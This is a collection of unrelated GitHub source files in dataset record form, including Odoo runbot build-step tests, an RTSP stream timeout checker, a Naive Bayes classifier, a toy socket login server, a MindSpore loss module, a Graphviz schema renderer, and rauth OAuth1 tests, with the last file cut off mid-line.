@patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_run_python(self, mock_checkout):\n \"\"\"minimal test for python steps. 
Also test that `-d` in cmd creates a database\"\"\"\n test_code = \"\"\"cmd = build._cmd()\ncmd += ['-d', 'test_database']\ndocker_params = dict(cmd=cmd)\n \"\"\"\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'python',\n 'python_code': test_code,\n })\n\n def docker_run(cmd, *args, **kwargs):\n run_cmd = cmd.build()\n self.assertIn('-d test_database', run_cmd)\n\n self.patchers['docker_run'].side_effect = docker_run\n config_step._run_step(self.parent_build)()\n self.patchers['docker_run'].assert_called_once()\n db = self.env['runbot.database'].search([('name', '=', 'test_database')])\n self.assertEqual(db.build_id, self.parent_build)\n\n def test_run_python_run(self):\n \"\"\"minimal test for python steps defining a run() entry point\"\"\"\n test_code = \"\"\"\ndef run():\n return {'a': 'b'}\n\"\"\"\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'python',\n 'python_code': test_code,\n })\n\n result = config_step._run_python(self.parent_build)\n self.assertEqual(result, {'a': 'b'})\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_sub_command(self, mock_checkout):\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'install_odoo',\n 'sub_command': 'subcommand',\n })\n call_count = 0\n\n def docker_run(cmd, log_path, *args, **kwargs):\n nonlocal call_count\n sub_command = cmd.cmd[cmd.index('server/server.py')+1]\n self.assertEqual(sub_command, 'subcommand')\n call_count += 1\n\n self.patchers['docker_run'].side_effect = docker_run\n config_step._run_step(self.parent_build)()\n\n self.assertEqual(call_count, 1)\n\n\nclass TestMakeResult(RunbotCase):\n\n def setUp(self):\n super(TestMakeResult, self).setUp()\n self.ConfigStep = self.env['runbot.build.config.step']\n self.Config = self.env['runbot.build.config']\n\n @patch('odoo.addons.runbot.models.build_config.os.path.getmtime')\n @patch('odoo.addons.runbot.models.build.BuildResult._log')\n def test_make_result(self, mock_log, mock_getmtime):\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\nInitiating shutdown\n\"\"\"\n logs = []\n\n def _log(func, message, level='INFO', log_type='runbot', path='runbot'):\n logs.append((level, message))\n\n mock_log.side_effect = _log\n mock_getmtime.return_value = 7200\n\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n 'test_tags': '/module,:class.method',\n })\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(logs, [('INFO', 'Getting results for build %s' % build.dest)])\n self.assertEqual(build.local_result, 'ok')\n # no shutdown\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\n \"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'No \"Initiating shutdown\" found in logs, maybe because of cpu limit.')\n ])\n # no loaded\n build = self.Build.create({\n 'params_id': 
self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\n\"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'Modules loaded not found in logs')\n ])\n\n # traceback\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\n2019-12-17 17:34:37,692 17 ERROR dbname path.to.test: FAIL: TestClass.test_\nTraceback (most recent call last):\nFile \"x.py\", line a, in test_\n ....\nInitiating shutdown\n\"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'Error or traceback found in logs')\n ])\n\n # warning in logs\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\n2019-12-17 17:34:37,692 17 WARNING dbname path.to.test: timeout exceeded\nInitiating shutdown\n\"\"\"\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'warn')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('WARNING', 'Warning found in logs')\n ])\n\n # no log file\n logs = []\n self.patchers['isfile'].return_value = False\n config_step._make_results(build)\n\n self.assertEqual(build.local_result, 'ko')\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest),\n ('ERROR', 'Log file not found at the end of test job')\n ])\n\n # no error but build was already in warn\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n logs = []\n file_content = \"\"\"\nLoading stuff\nodoo.stuff.modules.loading: Modules loaded.\nSome post install stuff\nInitiating shutdown\n\"\"\"\n self.patchers['isfile'].return_value = True\n build.local_result = 'warn'\n with patch('builtins.open', mock_open(read_data=file_content)):\n config_step._make_results(build)\n self.assertEqual(logs, [\n ('INFO', 'Getting results for build %s' % build.dest)\n ])\n self.assertEqual(str(build.job_end), '1970-01-01 02:00:00')\n self.assertEqual(build.local_result, 'warn')\n\n @patch('odoo.addons.runbot.models.build_config.ConfigStep._make_tests_results')\n def test_make_python_result(self, mock_make_tests_results):\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'python',\n 'test_tags': '/module,:class.method',\n 'python_result_code': \"\"\"a = 2*5\\nreturn_value = {'local_result': 'ok'}\"\"\"\n })\n build = self.Build.create({\n 'params_id': self.base_params.id,\n })\n build.local_state = 'testing'\n self.patchers['isfile'].return_value = False\n config_step._make_results(build)\n self.assertEqual(build.local_result, 'ok')\n\n # invalid result code (no return_value set)\n config_step.python_result_code = \"\"\"a = 2*5\\nr = {'a': 'ok'}\\nreturn_value = 'ko'\"\"\"\n with self.assertRaises(RunbotException):\n 
config_step._make_results(build)\n\n # no result defined\n config_step.python_result_code = \"\"\n mock_make_tests_results.return_value = {'local_result': 'warn'}\n config_step._make_results(build)\n self.assertEqual(build.local_result, 'warn')\n\n# TODO add generic test to copy_paste _run_* in a python step\n","repo_name":"odoo/runbot","sub_path":"runbot/tests/test_build_config_step.py","file_name":"test_build_config_step.py","file_ext":"py","file_size_in_byte":34725,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"31"} +{"seq_id":"2388475795","text":"# opencv_demo.py\n# OpenCV-Python timeout for opening a non-existent RTSP video stream\nimport threading\nimport time\n\nimport cv2\n\nTIME_LIMITED: int = 5\n\n\nclass MyThread(threading.Thread):\n def __init__(self, target, args=()):\n super(MyThread, self).__init__()\n self.func = target\n self.args = args\n\n def run(self):\n self.result = self.func(*self.args)\n\n def get_result(self):\n try:\n return self.result\n except Exception:\n return None\n\n\n# Decorator to limit the actual request time or function execution time\ndef limit_decor(limit_time):\n \"\"\"\n :param limit_time: Set the maximum allowable execution time, unit: second\n :return: the decorated function's return value if it finishes in time; (False, None) on timeout\n \"\"\"\n\n def functions(func):\n def run(*params):\n thre_func = MyThread(target=func, args=params)\n # Daemon thread: it is killed when the main thread exits, so a timed-out call cannot block shutdown\n thre_func.setDaemon(True)\n thre_func.start()\n # Split the time limit into whole-second sleeps plus a fractional remainder\n sleep_num = int(limit_time // 1)\n sleep_nums = round(limit_time % 1, 1)\n # Sleep in short slices and poll for the return value\n for i in range(sleep_num):\n time.sleep(1)\n infor = thre_func.get_result()\n if infor:\n return infor\n time.sleep(sleep_nums)\n # Final return value (whether or not the thread has terminated)\n if thre_func.get_result():\n return thre_func.get_result()\n else:\n return (False, None) # Timeout returns can be customized\n\n return run\n\n return functions\n\n\n@limit_decor(TIME_LIMITED)\ndef video_capture_open(rtsp):\n capture = cv2.VideoCapture(rtsp)\n return (True, capture)\n\n\ndef frame_get(rtsp):\n try:\n cap_status, cap = video_capture_open(rtsp)\n return cap_status\n except Exception as err:\n print(err)\n pass\n\n\ndef isOpen(rtsp) -> bool:\n return frame_get(rtsp)\n\n\nif __name__ == \"__main__\":\n opened = isOpen('rtsp://admin:calming123@192.168.3.110:554/h264Preview_01_sub')\n if not opened:\n print('rtsp stream is not readable')\n else:\n print('rtsp stream is readable')\n","repo_name":"MrSSai/RTSP2WS","sub_path":"rtsp.py","file_name":"rtsp.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40460175087","text":"# Rohith Ravindranath\n# Naive Bayes Classifier\n# March 10 2019\n\nimport pandas as pd\nimport numpy as np\nfrom sys import argv\n\nclass NBClassifier:\n\n def read_data(self, file_name):\n data = pd.read_excel(file_name)\n return data\n\n def calculate_probability(self, buy, day, discount, delivery):\n day_given_buy_p = len(data.loc[(data['Purchase'] == buy) & (data['Day'] == day) ]) /len(data.loc[(data['Purchase'] == buy) ])\n discount_given_buy_p = len(data.loc[(data['Discount'] == discount) & (data['Purchase'] == buy) ]) /len(data.loc[(data['Purchase'] == buy)])\n delivery_given_buy_p = len(data.loc[(data['Free Delivery'] == delivery) & (data['Purchase'] == buy) ]) 
/len(data.loc[(data['Purchase'] == buy) ])\n buy_p = len(data.loc[ data['Purchase'] == buy ]) / len(data)\n day_p = len(data.loc[ (data['Day'] == day) ]) / len(data)\n discount_p = len(data.loc[(data['Discount'] == discount) ]) / len(data)\n delivery_p = len(data.loc[(data['Free Delivery'] == delivery) ]) / len(data)\n probability = (day_given_buy_p * discount_given_buy_p * delivery_given_buy_p * buy_p ) / (day_p * discount_p * delivery_p )\n return probability\n\n def classify(self, day, discount, delivery):\n yes_p = self.calculate_probability( 'Yes', day, discount, delivery)\n no_p = self.calculate_probability( 'No', day, discount, delivery)\n total_p = yes_p + no_p\n yes_p = yes_p / total_p\n no_p = no_p / total_p\n return yes_p*100,no_p*100\n\nif len(argv) != 5:\n print('USAGE: python3 NBC.py [file_name] [Buy? Yes or No] [Day? Weekday or Weekend or Holiday] [Discount? Yes or No] [Free Delivery? Yes or No]')\n exit()\nfile_name = argv[1]\nday = argv[2]\ndiscount = argv[3]\ndelivery = argv[4]\n\nnbc = NBClassifier()\ndata = nbc.read_data(file_name)\nyes,no = nbc.classify(day,discount,delivery)\nprint('Likelihood of Purchase: ' + str(round(yes, 2)) + '%')\nprint('Likelihood of No Purchase: ' + str(round(no, 2)) + '%')\n","repo_name":"rohithravin/Machine-Learning-Algorithms","sub_path":"Naive Bias Classifer/NBC.py","file_name":"NBC.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13058543805","text":"import os\nimport sys\nfrom os.path import expanduser\n\nscript = sys.argv[0]\ndirectory = sys.argv[1]\npath = os.path.dirname(directory)\nhome = expanduser(\"~\")\n\nrules = ('.mkv', '.webm', '.mp4')\n\nfor file in os.listdir(path):\n new_path = home + \"/\" + path + \"/\" + file + \"/\"\n for each in os.listdir(new_path):\n if each.endswith(\".json\"):\n src = new_path + each\n dst = new_path + \"video.json\"\n os.rename(src, dst)\n\n if each == \"Video1\":\n src = new_path + each\n dst = new_path + \"video.mkv\"\n os.rename(src, dst)\n\n","repo_name":"TechTube/TechTube-Replication-Package","sub_path":"Scripts/renamer/renamer.py","file_name":"renamer.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12615570741","text":"from turtle import *\nfrom math import floor\n\ndef draw_buildings(buildings,shift,scale):\n\n t = Turtle()\n t.pu()\n t.speed(0)\n t.hideturtle()\n for building in buildings:\n t.goto(building[0]*scale+shift,shift)\n t.pd()\n t.goto(building[0] * scale +shift, building[2] * scale +shift)\n t.goto(building[1] * scale+shift, building[2] * scale+shift)\n t.goto(building[1] * scale+shift, shift)\n t.pu()\ndef draw_line(lines,shift,scale):\n t = Turtle()\n t.pu()\n t.speed(0)\n t.pensize(3)\n t.hideturtle()\n\n for line in lines:\n if line[1] > 0:\n t.pencolor('red')\n t.goto(line[0] * scale + shift, shift)\n t.pd()\n t.goto(line[0] * scale + shift, line[1] * scale + shift)\n t.pu()\n else:\n t.pencolor('green')\n t.goto(line[0] * scale + shift, shift)\n t.pd()\n t.goto(line[0] * scale + shift, shift-100)\n t.pu()\ndef build_data(buildings):\n l=[]\n r=[]\n h=[]\n for building in buildings:\n l.append(building[0])\n r.append(building[1])\n h.append(building[2])\n return l,r,h\n\ndef maxheight(x):\n max = 0\n for building in buildings:\n if (x>=building[0] and x<building[1] and building[2]>max):\n max = building[2]\n return max\n\n\ndef sil(p,q):\n m = floor((p+q)/2)\n if p == q:\n return 
[(l[p],h[p]),(r[p],0)]\n else:\n left_result = sil(p,m)\n right_result = sil(m+1,q)\n left_len = len(left_result) - 1\n right_len = len(right_result) - 1\n left_pt = 0\n right_pt = 0\n\n final_result = []\n\n while (left_pt <= left_len) and (right_pt <= right_len):\n if left_result[left_pt][0] < right_result[right_pt][0]: #take item with smaller x\n if (maxheight(left_result[left_pt][0]) == (left_result[left_pt][1])) and (len(final_result)==0 or final_result[-1][1]!=left_result[left_pt][1]):\n final_result.append(left_result[left_pt])\n elif (left_result[left_pt][1]) ==0:\n temp = (left_result[left_pt][0],maxheight(left_result[left_pt][0]))\n final_result.append(temp)\n left_pt = left_pt +1\n else:\n if maxheight(right_result[right_pt][0]) == (right_result[right_pt][1]) and (len(final_result)==0 or final_result[-1][1]!=right_result[right_pt][1]):\n final_result.append(right_result[right_pt])\n elif (right_result[right_pt][1]) ==0:\n temp = (right_result[right_pt][0],maxheight(right_result[right_pt][0]))\n final_result.append(temp)\n right_pt = right_pt +1\n\n\n\n if (right_pt <= right_len):\n final_result.extend(right_result[right_pt::])\n else:\n final_result.extend(left_result[left_pt::])\n\n return final_result\n\n\nif __name__ == \"__main__\":\n buildings = [[1,4,2],[8,9,5],[7,10,3],[3,6,3],[2,5,4]] #[1,4,2],[8,9,5],[7,10,3],[3,6,3],[2,5,4]\n l,r,h = build_data(buildings)\n #for i in range(11):\n # print(maxheight(i))\n draw_buildings(buildings,-500,100)\n result = sil(0,len(buildings)-1)\n print(result)\n draw_line(result,-500,100)\n\n done()","repo_name":"GaryTin/For_Hayley","sub_path":"3711asg1Q5.py","file_name":"3711asg1Q5.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28895897285","text":"FOREIGN_KEY_EDGE_CONNECT_PORT = 1\nFOREIGN_KEY_EDGE_CONNECT_NODE = 2\n\n\nclass DotRenderer:\n def __init__(self):\n self.label_foreign_key_edges = True\n self.foreign_key_edge_mode = FOREIGN_KEY_EDGE_CONNECT_NODE\n self.href_prefix = '#'\n\n def render(self, out_file, database):\n rendered_chunks = self.render_dot_chunks(database)\n\n out_file.writelines(rendered_chunks)\n\n def render_dot_chunks(self, database):\n yield 'digraph schema {\\n'\n yield ' outputorder=edgesfirst\\n'\n\n for schema in sorted(database.schemas.values(), key=lambda s: s.name):\n yield ' subgraph cluster_{} {{\\n'.format(schema.name)\n yield ' label = \"{}\"\\n'.format(schema.name)\n\n for table in schema.tables:\n yield self.render_table_node(table)\n\n yield ' }\\n'\n\n for schema in database.schemas.values():\n for table in schema.tables:\n yield self.render_table_edges(table)\n\n yield '}\\n'\n\n def render_table_node(self, table):\n return (\n '{indent}{node_name} [\\n'\n '{indent} shape = none\\n'\n '{indent} href = \"{href}\"\\n'\n '{indent} target = \"_top\"\\n'\n '{indent} label = {label}\\n'\n '{indent}]\\n'\n ).format(\n indent=' ',\n node_name=table_node_name(table.schema.name, table.name),\n href=\"{}{}\".format(self.href_prefix, table.name.replace('_', '-')),\n label=self.render_table_html_label(table)\n )\n\n def render_table_edges(self, table):\n return ''.join(\n self.render_foreign_key(table, foreign_key)\n for foreign_key in table.foreign_keys\n )\n\n def render_foreign_key(self, table, foreign_key):\n attributes = {}\n\n if self.label_foreign_key_edges:\n attributes['label'] = '{port} = {dest_port}'.format(\n port=foreign_key.columns[0],\n dest_port=foreign_key.ref_columns[0]\n )\n\n if 
self.foreign_key_edge_mode == FOREIGN_KEY_EDGE_CONNECT_PORT:\n source = '{node_name}:{port}'.format(\n node_name=table_node_name(table.schema.name, table.name),\n port=foreign_key.columns[0]\n )\n target = '{dest_node_name}:{dest_port}'.format(\n dest_node_name=table_node_name(\n foreign_key.ref_table.schema.name,\n foreign_key.ref_table.name\n ),\n dest_port=foreign_key.ref_columns[0]\n )\n else:\n source = '{node_name}'.format(\n node_name=table_node_name(table.schema.name, table.name)\n )\n target = '{dest_node_name}'.format(\n dest_node_name=table_node_name(\n foreign_key.ref_table.schema.name,\n foreign_key.ref_table.name\n )\n )\n\n return '{indent}{source} -> {target} [ {attributes} ];\\n'.format(\n indent=' ',\n source=source,\n target=target,\n attributes=' '.join(\n '{}=\"{}\"'.format(key, value)\n for key, value in attributes.items()\n )\n )\n\n def render_table_html_label(self, table):\n return (\n '<<table border=\"0\" cellborder=\"1\" cellspacing=\"0\">\n'\n ' <tr><td colspan=\"3\"><b>{name}</b></td></tr>\n'\n '{column_rows}\n'\n '</table>>\n'
\n ).format(\n name=table.name,\n column_rows='\n'.join(\n ' <tr><td>{attrs}</td>'\n '<td port=\"{col_name}\" align=\"left\">{col_name}</td>'\n '<td align=\"left\">{data_type}</td></tr>'.format(\n attrs='PK' if (\n table.primary_key and\n c.name in table.primary_key.columns\n ) else '',\n col_name=c.name,\n data_type=c.data_type\n )\n for c in table.columns\n )\n )\n\n\ndef table_node_name(schema_name, table_name):\n return '{}_{}'.format(schema_name, table_name)\n","repo_name":"hendrikx-itc/pg-db-tools","sub_path":"src/pg_db_tools/dot_renderer.py","file_name":"dot_renderer.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"19211566502","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 18 07:47:48 2019\r\n\r\n@author: hp\r\n\"\"\"\r\nimport socket\r\ns = socket.socket()\r\nport = 12345\r\n\r\ns.bind(('', port))\r\n\r\ns.listen(5)\r\n\r\nwhile True: \r\n\r\n# Establish connection with client. \r\n c, addr = s.accept()\t \r\n print ('Got connection from', addr) \r\n data_1=b'Enter the email'\r\n c.send(data_1)\r\n data_2=c.recv(1024)\r\n data_2=data_2.decode(\"utf-8\")\r\n \r\n if data_2==\"ankur\":\r\n data_3=b'Enter the password'\r\n #data_3.encode(\"utf-8\")\r\n c.send(data_3)\r\n \r\n #data_69=bytes(data_2, 'utf-8')\r\n #c.send(data_69)\r\n data_4=c.recv(1024)\r\n data_4=data_4.decode(\"utf-8\")\r\n if data_4==\"kumar\":\r\n data_5=b'connection established'\r\n #data_5.encode(\"utf-8\")\r\n c.send(data_5)\r\n c.close()\r\n else:\r\n c.send(b'not valid')\r\n c.close()\r\n else:\r\n c.send(b'not valid')\r\n c.close() \r\n","repo_name":"ankur0rajput/Adhocnw","sub_path":"Client to server/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32321294949","text":"# coding: utf-8\n\nclass Solution:\n \"\"\"\n @param A: An integer array.\n @param k: A positive integer (k <= length(A))\n @param target: Integer\n @return a list of lists of integer\n \"\"\"\n def kSumII(self, A, k, target):\n # write your code here\n self.ret = []\n self.dfs(A, k, target, 0, [])\n return self.ret\n\n def dfs(self, A, k, target, index, candidates):\n if (target == 0) and (k == 0):\n self.ret.append(candidates)\n return None\n if (len(A) == index) or (target < 0) or (k < 0):\n return None\n # skip A[index]\n self.dfs(A, k, target, index + 1, candidates)\n # keep A[index]\n new_candidates = []\n new_candidates.extend(candidates)\n new_candidates.append(A[index])\n self.dfs(A, k - 1, target - A[index], index + 1, new_candidates)\n\n# medium: http://lintcode.com/zh-cn/problem/k-sum-ii/\n","repo_name":"yingl/LintCodeInPython","sub_path":"k-sum-ii.py","file_name":"k-sum-ii.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"3653370369","text":"\"\"\"loss factory\"\"\"\n\nimport mindspore.nn as nn\nimport mindspore.ops as ops\n\n\nclass CrossEntropySmooth(nn.LossBase):\n \"\"\"CrossEntropy\"\"\"\n\n def __init__(self, smooth_factor=0., factor=0.):\n super(CrossEntropySmooth, self).__init__()\n self.smoothing = smooth_factor\n self.confidence = 1. 
- smooth_factor\n self.factor = factor\n self.log_softmax = ops.LogSoftmax()\n self.gather = ops.Gather()\n self.expand = ops.ExpandDims()\n\n def construct(self, logit, label):\n loss_aux = 0\n if self.factor > 0:\n logit, aux = logit\n auxprobs = self.log_softmax(aux)\n nll_loss_aux = ops.gather_d((-1 * auxprobs), 1, self.expand(label, -1))\n nll_loss_aux = nll_loss_aux.squeeze(1)\n smooth_loss = -auxprobs.mean(axis=-1)\n loss_aux = (self.confidence * nll_loss_aux + self.smoothing * smooth_loss).mean()\n logprobs = self.log_softmax(logit)\n nll_loss_logit = ops.gather_d((-1 * logprobs), 1, self.expand(label, -1))\n nll_loss_logit = nll_loss_logit.squeeze(1)\n smooth_loss = -logprobs.mean(axis=-1)\n loss_logit = (self.confidence * nll_loss_logit + self.smoothing * smooth_loss).mean()\n loss = loss_logit + self.factor * loss_aux\n return loss\n\n\ndef create_loss(args):\n if args.loss == 'cross_entropy_smooth':\n loss = CrossEntropySmooth(smooth_factor=args.smooth_factor,\n factor=args.factor)\n elif args.loss == 'softmax_cross_entropy_with_logits':\n loss = nn.SoftmaxCrossEntropyWithLogits(sparse=args.sparse,\n reduction=args.reduction)\n return loss\n","repo_name":"0jason000/mae_vit","sub_path":"src/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"3200500803","text":"# -*- coding: utf-8 -*-\n'''\n rauth.test_service_oauth1\n -------------------------\n\n Test suite for rauth.service.OAuth1Service.\n'''\n\nfrom base import RauthTestCase\nfrom test_service import HttpMixin, RequestMixin, ServiceMixin\n\nfrom rauth.compat import parse_qsl, quote, is_basestring, iteritems\nfrom rauth.service import OAuth1Service\nfrom rauth.session import OAUTH1_DEFAULT_TIMEOUT, OAuth1Session\nfrom rauth.utils import CaseInsensitiveDict, ENTITY_METHODS, FORM_URLENCODED\n\nfrom copy import deepcopy\nfrom hashlib import sha1\n\nfrom mock import patch\n\nimport rauth\n\nimport requests\n\nimport json\nimport pickle\n\n\nclass OAuth1ServiceTestCase(RauthTestCase, RequestMixin, ServiceMixin,\n HttpMixin):\n consumer_key = '000'\n consumer_secret = '111'\n\n access_token = '123'\n access_token_secret = '456'\n\n def setUp(self):\n RauthTestCase.setUp(self)\n\n self.request_token_url = 'http://example.com/request'\n self.access_token_url = 'http://example.com/access'\n self.authorize_url = 'http://example.com/authorize'\n self.base_url = 'http://example.com/api/'\n\n self.service = OAuth1Service(self.consumer_key,\n self.consumer_secret,\n name='service',\n request_token_url=self.request_token_url,\n access_token_url=self.access_token_url,\n authorize_url=self.authorize_url,\n base_url=self.base_url)\n\n self.session = self.service.get_session(('123', '456'))\n\n # patches\n self.session.request = self.fake_request\n self.service.get_session = self.fake_get_session\n\n def fake_get_auth_header(self, oauth_params, realm=None):\n auth_header = 'OAuth realm=\"{realm}\"'.format(realm=realm)\n params = ''\n for k, v in iteritems(oauth_params):\n params += ',{key}=\"{value}\"'.format(key=k, value=quote(str(v)))\n auth_header += params\n return auth_header\n\n @patch.object(rauth.session.HmacSha1Signature, 'sign')\n @patch.object(rauth.session, 'time')\n @patch.object(rauth.session, 'random')\n @patch.object(requests.Session, 'request')\n def fake_request(self,\n method,\n url,\n mock_request,\n mock_random,\n mock_time,\n mock_sig,\n header_auth=False,\n realm='',\n **kwargs):\n 
fake_random = 1\n fake_time = 1\n fake_sig = 'foo'\n fake_sig_meth = 'HMAC-SHA1'\n fake_nonce = sha1(str(fake_random).encode('ascii')).hexdigest()\n\n mock_request.return_value = self.response\n mock_random.return_value = fake_random\n mock_time.return_value = fake_time\n mock_sig.return_value = fake_sig\n\n method = method\n url = self.session._set_url(url)\n\n service = OAuth1Service(self.consumer_key,\n self.consumer_secret,\n name='service',\n request_token_url=self.request_token_url,\n access_token_url=self.access_token_url,\n authorize_url=self.authorize_url,\n base_url=self.base_url)\n\n session = service.get_session((self.access_token,\n self.access_token_secret))\n\n r = session.request(method,\n url,\n header_auth=header_auth,\n realm=realm,\n **deepcopy(kwargs))\n\n kwargs.setdefault('headers', {})\n kwargs['headers'] = CaseInsensitiveDict(kwargs['headers'])\n\n entity_method = method.upper() in ENTITY_METHODS\n if entity_method:\n kwargs['headers'].setdefault('Content-Type', FORM_URLENCODED)\n\n form_urlencoded = \\\n kwargs['headers'].get('Content-Type') == FORM_URLENCODED\n\n if is_basestring(kwargs.get('params')):\n kwargs['params'] = dict(parse_qsl(kwargs['params']))\n\n if is_basestring(kwargs.get('data')) and form_urlencoded:\n kwargs['data'] = dict(parse_qsl(kwargs['data']))\n\n oauth_params = {'oauth_consumer_key': session.consumer_key,\n 'oauth_nonce': fake_nonce,\n 'oauth_signature_method': fake_sig_meth,\n 'oauth_timestamp': fake_time,\n 'oauth_token': self.access_token,\n 'oauth_version': session.VERSION,\n 'oauth_signature': fake_sig}\n\n if header_auth:\n auth = mock_request.call_args[1]['auth']\n auth_header = self.fake_get_auth_header(oauth_params, realm=realm)\n self.assertEqual(auth(requests.Request()).headers['Authorization'],\n auth_header)\n kwargs['auth'] = auth\n elif entity_method:\n kwargs['data'] = kwargs.get('data') or {}\n\n if form_urlencoded:\n kwargs['data'].update(oauth_params)\n else:\n kwargs.setdefault('params', {})\n kwargs['params'].update(oauth_params)\n else:\n kwargs.setdefault('params', {})\n kwargs['params'].update(**oauth_params)\n\n mock_request.assert_called_with(method,\n url,\n timeout=OAUTH1_DEFAULT_TIMEOUT,\n **kwargs)\n return r\n\n def fake_get_session(self, token=None, signature=None):\n return self.session\n\n def test_get_session(self):\n s = self.service.get_session()\n self.assertIsInstance(s, OAuth1Session)\n\n def test_get_raw_request_token(self):\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n r = self.service.get_raw_request_token()\n self.assertEqual(r.content, resp)\n\n def test_get_raw_request_token_missing_request_token_url(self):\n self.service.request_token_url = None\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n with self.assertRaises(TypeError) as e:\n self.service.get_raw_request_token()\n self.assertEqual(str(e.exception),\n 'request_token_url must not be None')\n\n def test_get_request_token(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n self.assertEqual(request_token, 'foo')\n self.assertEqual(request_token_secret, 'bar')\n\n def test_get_request_token_with_json_decoder(self):\n self.response.content = json.dumps({'oauth_token': 'foo',\n 'oauth_token_secret': 'bar'})\n request_token, request_token_secret = \\\n self.service.get_request_token(decoder=json.loads)\n self.assertEqual(request_token, 'foo')\n 
self.assertEqual(request_token_secret, 'bar')\n\n def test_get_authorize_url(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n url = self.service.get_authorize_url(request_token)\n expected_fmt = 'http://example.com/authorize?oauth_token={0}'\n self.assertEqual(url, expected_fmt.format(request_token))\n\n def test_get_authorize_url_with_url_encoded_characters(self):\n token = 'uDV8XWNLSJjzMUSVfbG1gYHWMjY%3D'\n token_secret = 'e%2Bt9QCndiw1%2BtJbhy5UYVMAPTPo%3D'\n response_fmt = 'oauth_token={0}&oauth_token_secret={1}'\n self.response.content = response_fmt.format(token, token_secret)\n request_token, request_token_secret = self.service.get_request_token()\n\n url = self.service.get_authorize_url(request_token)\n expected_fmt = 'http://example.com/authorize?oauth_token={0}'\n self.assertEqual(url, expected_fmt.format(token))\n\n def test_get_raw_access_token(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n r = self.service.get_raw_access_token(request_token,\n request_token_secret)\n self.assertEqual(r.content, resp)\n\n def test_get_raw_access_token_missing_access_token_url(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n self.service.access_token_url = None\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n\n with self.assertRaises(TypeError) as e:\n self.service.get_raw_access_token(request_token,\n request_token_secret)\n self.assertEqual(str(e.exception),\n 'access_token_url must not be None')\n\n def test_get_access_token(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n self.response.content = 